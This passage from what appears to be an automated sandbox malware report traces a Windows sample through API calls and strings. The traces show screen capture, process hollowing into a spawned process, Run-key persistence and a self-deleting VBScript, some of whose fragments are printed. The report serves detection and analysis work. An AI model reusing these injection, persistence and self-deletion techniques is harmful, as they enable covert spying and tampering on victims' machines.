                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                Function 00436D48 Relevance: .2, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                Function 004367C6 Relevance: .2, Instructions: 240COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                Function 0043D098 Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                Function 007BD0A2 Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction ID: 5038aa702aeb1f58a2bc67df1bbdaa1771580adac25176d37f7c26e50c6108b8
                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction Fuzzy Hash: F361887170074DA7DA38AA6C88DABFE7398EF41300F24051AE947DB291F65EDD82C359
                                                                                Function 007BD2FF Relevance: .2, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction ID: 6ca96b225f9ef6bbda37ea35fd7fbbba47e0342dc6eca50a3f10d205b635db41
                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction Fuzzy Hash: E5614671200748D6DA389AA888AABFE33D4EF41704F18051AED42DB292F66DED41C757
                                                                                Function 0043651C Relevance: .2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                Function 00426FAD Relevance: .2, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                                                                                • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                • Opcode Fuzzy Hash: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                                                                                • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                Function 007A7214 Relevance: .2, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                • Instruction ID: d2811c7b95ba802b7c99bd57ae0eb635dc29df4bf1ab55c17c08f016195bd907
                                                                                • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                • Instruction Fuzzy Hash: 78615B32A0C3459FC308DF34D985A5BB7E8AFDD714F450E2EF4999A151E774EA088B82
                                                                                Function 00437150 Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                Function 007B73B7 Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: 2f88ba3cc1a963d86c2d7900e4973be527442462abd46937ca24dd6be51c9d99
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: BB112B772080C247DA1CCA2DD4B43FBAF85EBC5322B3C467AD4418BB58D62AEA44F600
                                                                                Function 005B0083 Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: 3107581f5a1fd6b2f547a8753fcb75ac1328b5c2fd6ebc1880acc18b8e143b56
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: E4119A72340104AFDB44DE59DC85FE777EAFB88320B298065ED08CB352E676E802C760
                                                                                Function 00780D90 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: c137a415cd33a37c16b2a2ea5c25f585a778bfd2a950d56cefb96e01b2f897f6
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: 0C01F272B406008FDF61EF60C805BAB33E5FB86306F0544A4D90A97282E378A8498BD0
                                                                                Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                                                • DeleteObject.GDI32(?), ref: 00418107
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                • DeleteDC.GDI32(?), ref: 00418398
                                                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 1352755160-865373369
                                                                                • Opcode ID: 77081d5ada2269ff57f64c9903efe4521e7653376ee8caac7412943a0dd9a50c
                                                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                • Opcode Fuzzy Hash: 77081d5ada2269ff57f64c9903efe4521e7653376ee8caac7412943a0dd9a50c
                                                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                • API String ID: 4188446516-3035715614
                                                                                • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                • API String ID: 4250697656-2665858469
                                                                                • Opcode ID: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                • Opcode Fuzzy Hash: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                • API String ID: 3797177996-1998216422
                                                                                • Opcode ID: 1a0008a7b032c45d953091ac1afb4bf8007bf4c9a0a3f4b2fa71c5b2a3510a05
